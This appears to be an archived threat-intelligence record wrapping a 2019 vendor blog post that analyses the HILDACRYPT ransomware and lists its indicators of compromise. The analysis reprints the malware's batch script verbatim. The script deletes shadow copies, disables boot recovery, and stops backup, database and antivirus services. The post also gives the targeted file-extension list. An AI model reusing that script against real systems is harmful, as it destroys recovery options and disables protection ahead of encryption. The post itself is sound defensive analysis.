{
	"id": "8fe9e212-72eb-4287-931d-884051d566f0",
	"created_at": "2026-04-06T01:30:36.089464Z",
	"updated_at": "2026-04-10T13:12:45.440223Z",
	"deleted_at": null,
	"sha1_hash": "1393b9225bead7067e826714fd7678e60f47b4aa",
	"title": "HILDACRYPT: A Ransomware Newcomer Hits Backup and Anti-virus Solutions",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 85271,
	"plain_text": "HILDACRYPT: A Ransomware Newcomer Hits Backup and Anti-virus\r\nSolutions\r\nBy MSPThreatsSecurityTeam\r\nPublished: 2019-10-18 · Archived: 2026-04-06 00:36:11 UTC\r\nHILDACRYPT ransom note\r\nA new ransomware family was discovered in August 2019. Called HILDACRYPT, it is named after the Netflix cartoon\r\n“Hilda” because the TV show’s YouTube trailer was included in the ransom note of the original version of the malware.\r\nHILDACRYPT camouflages itself as a legitimate XAMPP installer, which is an easy to install Apache distribution\r\ncontaining MariaDB, PHP, and Perl. However, the cryptolocker’s file name ‘xamp’ differs from the legitimate version.\r\nMoreover, the ransomware file does not have a digital signature.\r\nStatic analysis\r\nThe ransomware file is PE32 .NET Assembly for MS Windows. It is 135168 bytes in size. Both the payload code and the\r\nprotector’s code are written in C#. According to the compilation timestamp, the binary was compiled on September 14,\r\n2019.\r\nWhile Detect It Easy claims the ransomware was packed with Confuser and ConfuserEx, these obfuscators are the same.\r\nConfuserEx is simply the successor of Confuser, so their code signatures are extremely similar.\r\nDetect It Easy analysis\r\nTo be entirely accurate, however, HILDACRYPT is packed with ConfuserEx.\r\nHILDACRYPT is packed with ConfuserEx\r\nSHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a\r\nAttack vector\r\nMost likely, the ransomware was found on one of the web programming sites pretending to be the legitimate version of\r\nXAMPP software.\r\nThe whole infection chain can be seen at app.any.run sandbox.\r\nObfuscation\r\nThe ransomware’s strings are encrypted when stored. 
Once launched, HILDACRYPT decodes them with Base64 and\r\ndecrypts them with AES-256-CBC.\r\nHILDACRYPT decodes ransomware strings with Base64 and AES-256-CBC\r\nInstallation\r\nhttps://www.acronis.com/en-eu/blog/posts/hildacrypt-ransomware-newcomer-hits-backup-and-anti-virus-solutions/\r\nPage 1 of 6\n\nFirst, the ransomware creates a folder in %AppData\\Roaming% with a randomly generated GUID (Globally Unique\r\nIdentifier). After adding the ‘bat’ file to this location, the ransomware then runs it with cmd.exe:\r\ncmd.exe /c \\ JKfgkgj3hjgfhjka.bat \\ \u0026 exit\r\nHILDACRYPT installation process\r\nIt then starts the batch script to disable system functions or services.\r\nHILDACRYPT disabling system functions and services\r\nThe script contains a long list of commands that delete shadow copies and disable any SQL server, as well as backup and\r\nanti-malware solutions.\r\nIn addition to attacking popular backup and anti-malware solutions from Veeam, Sophos, Kaspersky, McAfee, and others,\r\nit also tries (unsuccessfully) to stop the Acronis Cyber Backup services.\r\n@echo off\r\n:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded\r\nvssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded\r\nvssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded\r\nvssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded\r\nvssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded\r\nvssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded\r\nbcdedit /set {default} recoveryenabled No\r\nbcdedit /set {default} bootstatuspolicy ignoreallfailures\r\nvssadmin Delete Shadows /all /quiet\r\nnet stop SQLAgent$SYSTEM_BGC /y\r\nnet stop “Sophos Device Control Service” /y\r\nnet stop macmnsvc /y\r\nnet stop SQLAgent$ECWDB2 /y\r\nnet stop “Zoolz 2 Service” /y\r\nnet stop McTaskManager /y\r\nnet stop “Sophos AutoUpdate Service” /y\r\nnet stop “Sophos System Protection Service” /y\r\nnet stop EraserSvc11710 /y\r\nnet stop PDVFSService /y\r\nnet stop SQLAgent$PROFXENGAGEMENT /y\r\nnet stop SAVService /y\r\nnet stop MSSQLFDLauncher$TPSAMA /y\r\nnet stop EPSecurityService /y\r\nnet stop SQLAgent$SOPHOS /y\r\nnet stop “Symantec System Recovery” /y\r\nnet stop Antivirus /y\r\nnet stop SstpSvc /y\r\nnet stop MSOLAP$SQL_2008 /y\r\nnet stop TrueKeyServiceHelper /y\r\nnet stop sacsvr /y\r\nnet stop VeeamNFSSvc /y\r\nnet stop FA_Scheduler /y\r\nnet stop SAVAdminService /y\r\nnet stop EPUpdateService /y\r\nnet stop VeeamTransportSvc /y\r\nnet stop “Sophos Health Service” /y\r\nnet stop bedbg /y\r\nnet stop MSSQLSERVER /y\r\nnet stop KAVFS /y\r\nnet stop Smcinst /y\r\nnet stop MSSQLServerADHelper100 /y\r\nnet stop TmCCSF /y\r\nnet stop wbengine /y\r\nnet stop SQLWriter /y\r\nnet stop MSSQLFDLauncher$TPS /y\r\nnet stop SmcService /y\r\nnet stop ReportServer$TPSAMA /y\r\nnet stop swi_update /y\r\nnet stop AcrSch2Svc /y\r\nnet stop MSSQL$SYSTEM_BGC /y\r\nnet stop VeeamBrokerSvc /y\r\nnet stop MSSQLFDLauncher$PROFXENGAGEMENT /y\r\nnet stop VeeamDeploymentService /y\r\nnet stop SQLAgent$TPS /y\r\nnet stop DCAgent /y\r\nnet stop “Sophos Message Router” /y\r\nnet stop MSSQLFDLauncher$SBSMONITORING /y\r\nnet stop wbengine /y\r\nnet stop MySQL80 /y\r\nnet stop MSOLAP$SYSTEM_BGC /y\r\nnet stop ReportServer$TPS /y\r\nnet stop MSSQL$ECWDB2 /y\r\nnet stop SntpService /y\r\nnet stop SQLSERVERAGENT /y\r\nnet stop BackupExecManagementService /y\r\nnet stop SMTPSvc /y\r\nnet stop mfefire /y\r\nnet stop BackupExecRPCService /y\r\nnet stop MSSQL$VEEAMSQL2008R2 /y\r\nnet stop klnagent /y\r\nnet stop MSExchangeSA /y\r\nnet stop MSSQLServerADHelper /y\r\nnet stop SQLTELEMETRY /y\r\nnet stop “Sophos Clean Service” /y\r\nnet stop swi_update_64 /y\r\nnet stop “Sophos Web Control Service” /y\r\nnet stop EhttpSrv /y\r\nnet stop POP3Svc /y\r\nnet stop MSOLAP$TPSAMA /y\r\nnet stop McAfeeEngineService /y\r\nnet stop “Veeam Backup Catalog Data Service” /\r\nnet stop MSSQL$SBSMONITORING /y\r\nnet stop ReportServer$SYSTEM_BGC /y\r\nnet stop AcronisAgent /y\r\nnet stop KAVFSGT /y\r\nnet stop BackupExecDeviceMediaService /y\r\nnet stop MySQL57 /y\r\nnet stop McAfeeFrameworkMcAfeeFramework /y\r\nnet stop TrueKey /y\r\nnet stop VeeamMountSvc /y\r\nnet stop MsDtsServer110 /y\r\nnet stop SQLAgent$BKUPEXEC /y\r\nnet stop UI0Detect /y\r\nnet stop ReportServer /y\r\nnet stop SQLTELEMETRY$ECWDB2 /y\r\nnet stop MSSQLFDLauncher$SYSTEM_BGC /y\r\nnet stop MSSQL$BKUPEXEC /y\r\nnet stop SQLAgent$PRACTTICEBGC /y\r\nnet stop MSExchangeSRS /y\r\nnet stop SQLAgent$VEEAMSQL2008R2 /y\r\nnet stop McShield /y\r\nnet stop SepMasterService /y\r\nnet stop “Sophos MCS Client” /y\r\nnet stop VeeamCatalogSvc /y\r\nnet stop SQLAgent$SHAREPOINT /y\r\nnet stop NetMsmqActivator /y\r\nnet stop kavfsslp /y\r\nnet stop tmlisten /y\r\nnet stop ShMonitor /y\r\nnet stop MsDtsServer /y\r\nnet stop SQLAgent$SQL_2008 /y\r\nnet stop SDRSVC /y\r\nnet stop IISAdmin /y\r\nnet stop SQLAgent$PRACTTICEMGT /y\r\nnet stop BackupExecJobEngine /y\r\nnet stop SQLAgent$VEEAMSQL2008R2 /y\r\nnet stop BackupExecAgentBrowser /y\r\nnet stop VeeamHvIntegrationSvc /y\r\nnet stop masvc /y\r\nnet stop W3Svc /y\r\nnet stop “SQLsafe Backup Service” /y\r\nnet stop SQLAgent$CXDB /y\r\nnet stop SQLBrowser /y\r\nnet stop MSSQLFDLauncher$SQL_2008 /y\r\nnet stop VeeamBackupSvc /y\r\nnet stop “Sophos Safestore Service” /y\r\nnet stop svcGenericHost /y\r\nnet stop ntrtscan /y\r\nnet stop SQLAgent$VEEAMSQL2012 /y\r\nnet stop MSExchangeMGMT /y\r\nnet stop SamSs /y\r\nnet stop MSExchangeES /y\r\nnet stop MBAMService /y\r\nnet stop EsgShKernel /y\r\nnet stop ESHASRV /y\r\nnet stop MSSQL$TPSAMA /y\r\nnet stop SQLAgent$CITRIX_METAFRAME /y\r\nnet stop VeeamCloudSvc /y\r\nnet stop “Sophos File Scanner Service” /y\r\nnet stop “Sophos Agent” /y\r\nnet stop MBEndpointAgent /y\r\nnet stop swi_service /y\r\nnet stop MSSQL$PRACTICEMGT /y\r\nnet stop SQLAgent$TPSAMA /y\r\nnet stop McAfeeFramework /y\r\nnet stop “Enterprise Client Service” /y\r\nnet stop SQLAgent$SBSMONITORING /y\r\nnet stop MSSQL$VEEAMSQL2012 /y\r\nnet stop swi_filter /y\r\nnet stop SQLSafeOLRService /y\r\nnet stop BackupExecVSSProvider /y\r\nnet stop VeeamEnterpriseManagerSvc /y\r\nnet stop SQLAgent$SQLEXPRESS /y\r\nnet stop OracleClientCache80 /y\r\nnet stop MSSQL$PROFXENGAGEMENT /y\r\nnet stop IMAP4Svc /y\r\nnet stop ARSM /y\r\nnet stop MSExchangeIS /y\r\nnet stop AVP /y\r\nnet stop MSSQLFDLauncher /y\r\nnet stop MSExchangeMTA /y\r\nnet stop TrueKeyScheduler /y\r\nnet stop MSSQL$SOPHOS /y\r\nnet stop “SQL Backups” /y\r\nnet stop MSSQL$TPS /y\r\nnet stop mfemms /y\r\nnet stop MsDtsServer100 /y\r\nnet stop MSSQL$SHAREPOINT /y\r\nnet stop WRSVC /y\r\nnet stop mfevtp /y\r\nnet stop msftesql$PROD /y\r\nnet stop mozyprobackup /y\r\nnet stop MSSQL$SQL_2008 /y\r\nnet stop SNAC /y\r\nnet stop ReportServer$SQL_2008 /y\r\nnet stop BackupExecAgentAccelerator /y\r\nnet stop MSSQL$SQLEXPRESS /y\r\nnet stop MSSQL$PRACTTICEBGC /y\r\nnet stop VeeamRESTSvc /y\r\nnet stop sophossps /y\r\nnet stop ekrn /y\r\nnet stop MMS /y\r\nnet stop “Sophos MCS Agent” /y\r\nnet stop RESvc /y\r\nnet stop “Acronis VSS Provider” /y\r\nnet stop MSSQL$VEEAMSQL2008R2 /y\r\nnet stop MSSQLFDLauncher$SHAREPOINT /y\r\nnet stop “SQLsafe Filter Service” /y\r\nnet stop MSSQL$PROD /y\r\nnet stop SQLAgent$PROD /y\r\nnet stop MSOLAP$TPS /y\r\nnet stop VeeamDeploySvc /y\r\nnet stop MSSQLServerOLAPService /y\r\ndel %0\r\nAfter disabling the above-mentioned services and processes, the cryptolocker collects information about all running\r\nprocesses using the tasklist command to make sure that all the needed services were disabled.\r\ntasklist /v /fo csv\r\nThis command displays a detailed list of running processes, with fields separated by ‘,’ (the captured sample below comes from a system with a Cyrillic locale):\r\n\"\\\"csrss.exe\\\",\\\"448\\\",\\\"services\\\",\\\"0\\\",\\\"1 896 КБ\\\",\\\"unknown\\\",\\\"Н/Д\\\",\\\"0:00:03\\\",\\\"Н/Д\\\"\"\r\nHILDACRYPT displaying running processes\r\nAfter this check, the ransomware starts the encryption process.\r\nEncryption\r\nFile encryption\r\nHILDACRYPT goes through all of the content of found drives, skipping the ‘Recycle.Bin’ and ‘Reference\r\nAssemblies\\\\Microsoft’ folders. (The second folder is skipped because it contains the vital files such as dll, pdb, etc.
for .Net applications that may affect the ransomware.)\r\nThe following list of file extensions is used by the ransomware to find the files to be encrypted:\r\n\".vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:\r\n.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:\r\n.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:\r\n.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:\r\n.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:\r\n.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:\r\n.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:\r\n.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:\r\n.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:\r\n.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:\r\n.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:\r\n.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:\r\n.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:\r\n.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:\r\n.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md\"\r\nTo encrypt the user’s files, the ransomware uses the AES-256-CBC algorithm. The key size is 256 bits and the IV is 16\r\nbytes.\r\nHILDACRYPT encrypts user files with AES-256-CBC\r\nIn the next screenshot, byte_2 and byte_1 are generated randomly via GetBytes().\r\nGenerating random byte keys with GetBytes()\r\nEncryption key and IV generation\r\nEncrypted files get an ‘HCY!’ extension. This is an example of an encrypted file. The Key and IV mentioned above were\r\ncreated for this file.\r\nHILDACRYPT applying HCY! extension\r\nKeys encryption\r\nThe cryptolocker stores the generated AES key in the encrypted file. The first part of the encrypted file has a header\r\ncontaining data such as ‘HILDACRYPT’, ‘KEY’, ‘IV’, and ‘FileLen’ in XML format and looks as follows:\r\nHILDACRYPT key encryption\r\nThe AES Key and IV are encrypted with RSA-2048 and encoded with Base64. The RSA public key is stored in one of the\r\nencrypted strings in XML format in the cryptolocker’s body.\r\n\u003cRSAKeyValue\u003e\u003cModulus\u003e28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/\r\ncs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/\r\nJgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/\r\n74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/\r\nUBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==\r\n\u003c/Modulus\u003e\u003cExponent\u003eAQAB\u003c/Exponent\u003e\u003c/RSAKeyValue\u003e\r\nThe RSA public key is used for AES file key encryption. The public RSA key is Base64 encoded and consists of the modulus\r\nand the public exponent 65537.
For decryption, the private RSA key is needed, and that is owned by the attacker.\r\nAfter RSA encryption, the AES key is encoded with Base64 and stored in the encrypted file.\r\nRansom notes\r\nWhen encryption is completed, HILDACRYPT drops an ‘html’ file into the folders where it encrypted files. The\r\nransom note contains two email addresses through which a victim should contact the attacker.\r\nhildalolilovesyou @ airmail . cc\r\nhildalolilovesyou @ memeware . net\r\nHILDACRYPT ransom note\r\nThe ransom note also has the message ‘No loli is safe ;)’, which refers to anime and manga characters that have the physiques\r\nof a prepubescent girl.\r\nConclusion\r\nAlthough HILDACRYPT is a new ransomware family, an even newer version of it already exists. The encryption model does not\r\nallow victims to decrypt files encrypted by the ransomware. The cryptolocker actively shuts\r\ndown protection services that belong to backup solutions and anti-virus products. The author of HILDACRYPT is clearly a fan of\r\nanime and the “Hilda” TV series on Netflix.\r\nAs usual, the good news is that Acronis Cyber Backup and Acronis True Image can protect your computer against\r\nHILDACRYPT ransomware – and service providers can similarly protect their customers with Acronis Backup Cloud.\r\nThat’s because not only do these cyber protection solutions offer backup, but they also include our integrated Acronis\r\nActive Protection, an AI-enabled and behavior-based technology that is uniquely able to deal with zero-day ransomware\r\nthreats.\r\nIoCs\r\n‘HCY!’ file extension\r\nHILDACRYPTReadMe.html\r\n‘xamp.exe’ with one ‘p’ symbol and without a digital signature\r\nSHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a\r\nSource:
https://www.acronis.com/en-eu/blog/posts/hildacrypt-ransomware-newcomer-hits-backup-and-anti-virus-solutions/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.acronis.com/en-eu/blog/posts/hildacrypt-ransomware-newcomer-hits-backup-and-anti-virus-solutions/"
	],
	"report_names": [
		"hildacrypt-ransomware-newcomer-hits-backup-and-anti-virus-solutions"
	],
	"threat_actors": [],
	"ts_created_at": 1775439036,
	"ts_updated_at": 1775826765,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1393b9225bead7067e826714fd7678e60f47b4aa.pdf",
		"text": "https://archive.orkl.eu/1393b9225bead7067e826714fd7678e60f47b4aa.txt",
		"img": "https://archive.orkl.eu/1393b9225bead7067e826714fd7678e60f47b4aa.jpg"
	}
}